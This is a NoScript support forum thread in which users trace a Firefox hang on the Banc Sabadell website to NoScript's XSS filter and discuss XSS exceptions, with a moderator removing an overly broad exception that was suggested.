site bancsabadell.com hangs with NoScript

Ask for help about NoScript, no registration needed to post
libove
Junior Member
Posts: 21
Joined: Thu Oct 07, 2010 4:39 pm

Re: site bancsabadell.com hangs with NoScript

Post by libove »

barbaz wrote:@libove: I think yours is the same issue as in https://forums.informaction.com/viewtopic.php?f=7&t=21178
I read this other thread. On the face it sounds like it would be similar, however I cannot reproduce the problem by visiting the Lloyd's bank site per the discussion.
So, while conceptually it may be similar, precisely it would seem to be different.

The initial reply from Banc Sabadell, useless as expected, was to use a different browser... I responded back with my credentials and asking them to escalate both to their I.T. management and to their Data Protection compliance people who would probably care to know that a core function (being able to login) is interfered with by the site's design when a user exercises their right to not be tracked (particularly in light of the upcoming European General Data Protection Regulation)...
Last edited by Thrawn on Tue Feb 23, 2016 2:48 am, edited 1 time in total.
Reason: Fix quote tag
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
barbaz
Senior Member
Posts: 10834
Joined: Sat Aug 03, 2013 5:45 pm

Re: site bancsabadell.com hangs with NoScript

Post by barbaz »

I'm guessing you might end to see some messages from NoScript XSS in the Browser Console (Ctrl-Shift-J) when the hang occurs. Or that it doesn't happen if you disable the XSS filter.
If I'm right it's all the more reason that you're doing the right thing by contacting them how you are, because that crosses the line from a privacy issue to a security issue.
*Always* check the changelogs BEFORE updating that important software!
-
libove
Junior Member
Posts: 21
Joined: Thu Oct 07, 2010 4:39 pm

Re: site bancsabadell.com hangs with NoScript

Post by libove »

barbaz wrote:I'm guessing you might end to see some messages from NoScript XSS in the Browser Console (Ctrl-Shift-J) when the hang occurs. Or that it doesn't happen if you disable the XSS filter.
If I'm right it's all the more reason that you're doing the right thing by contacting them how you are, because that crosses the line from a privacy issue to a security issue.
I reproduced the hang, with the Browser Console open. Nothing about NoScript XSS at all. In fact, the messages in the Console are the same with and without the hang (except of course that, with www.bancsabadell.com allowed in NoScript, bancsabadell.com and datalog.bancsabadell.com not allowed, Firefox doesn't hang and more messages appear in the Console as I navigate farther through the site).

So, maybe this is completely different than the other/XSS related issue.
Last edited by Thrawn on Wed Feb 24, 2016 11:55 pm, edited 1 time in total.
Reason: Fix quote tag
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
barbaz
Senior Member
Posts: 10834
Joined: Sat Aug 03, 2013 5:45 pm

Re: site bancsabadell.com hangs with NoScript

Post by barbaz »

libove wrote:So, maybe this is completely different than the other/XSS related issue.
OK so it's maybe not actual XSS or anything the XSS filter needs to act on, but it could still be that a lot of something is happening that the XSS filter is checking (e.g. the site writing data to window.name). If you try with XSS filter disabled (NoScript Options > Advanced > XSS, un-check both boxes) does the issue still occur? That's the way to be sure.
(This is NOT a safe thing to do, and I can understand if you don't want to try it. To mitigate risks of this test, use an isolated browser session - don't browse *any* other sites, not even in separate tabs/windows, while testing. And make sure to re-enable XSS filter when done.)
*Always* check the changelogs BEFORE updating that important software!
-
libove
Junior Member
Posts: 21
Joined: Thu Oct 07, 2010 4:39 pm

Re: site bancsabadell.com hangs with NoScript

Post by libove »

barbaz wrote:
libove wrote:So, maybe this is completely different than the other/XSS related issue.
OK so it's maybe not actual XSS or anything the XSS filter needs to act on, but it could still be that a lot of something is happening that the XSS filter is checking (e.g. the site writing data to window.name). If you try with XSS filter disabled (NoScript Options > Advanced > XSS, un-check both boxes) does the issue still occur? That's the way to be sure.
(This is NOT a safe thing to do, and I can understand if you don't want to try it. To mitigate risks of this test, use an isolated browser session - don't browse *any* other sites, not even in separate tabs/windows, while testing. And make sure to re-enable XSS filter when done.)
You pegged it. The NoScript option "Sanitize cross-site suspicious requests" being enabled is what triggers the Firefox hang on displaying the bancsabadell.com site (with datalog.bancsabadell.com allowed in NoScript).

So, what does this mean/ what can I now provide in more detail to Banc Sabadell to help them fix their brokenness?

many thanks for the continuing efforts!
-Jay
Last edited by barbaz on Wed Feb 24, 2016 5:32 pm, edited 1 time in total.
Reason: enable bbcode
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
barbaz
Senior Member
Posts: 10834
Joined: Sat Aug 03, 2013 5:45 pm

Re: site bancsabadell.com hangs with NoScript

Post by barbaz »

@libove: Please change the format of quotes if you choose to disable BBCode in your posts - e.g. do what therube does and quote email style, put a > and a space before the quote.
libove wrote:You pegged it. The NoScript option "Sanitize cross-site suspicious requests" being enabled is what triggers the Firefox hang on displaying the bancsabadell.com site (with datalog.bancsabadell.com allowed in NoScript).

So, what does this mean/ what can I now provide in more detail to Banc Sabadell to help them fix their brokenness?
Not sure. My best educated guess would be that they are using the highly unsafe practice of writing data to window.name to pass data across domains (any site can read it) and the XSS filter is at the very least scrutinizing it. But again, that's just a guess. I don't know. :|
(I also don't know if the XSS filter logs anything to the Browser Console (Ctrl-Shift-J) even if disabled?)
*Always* check the changelogs BEFORE updating that important software!
-
Costa Brava

Re: site bancsabadell.com hangs with NoScript

Post by Costa Brava »

By adding the pattern
[dangerous suggestion deleted by moderator]

to the exceptions list on the XSS tab you won't have to compromise your global XSS settings.
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
barbaz
Senior Member
Posts: 10834
Joined: Sat Aug 03, 2013 5:45 pm

Re: site bancsabadell.com hangs with NoScript

Post by barbaz »

No. That's opening up the bank site to XSS from any site.

Please re-formulate that as an XSS exception for request of origin (@ exception) per the sticky and post back, thanks.
*Always* check the changelogs BEFORE updating that important software!
-
Post Reply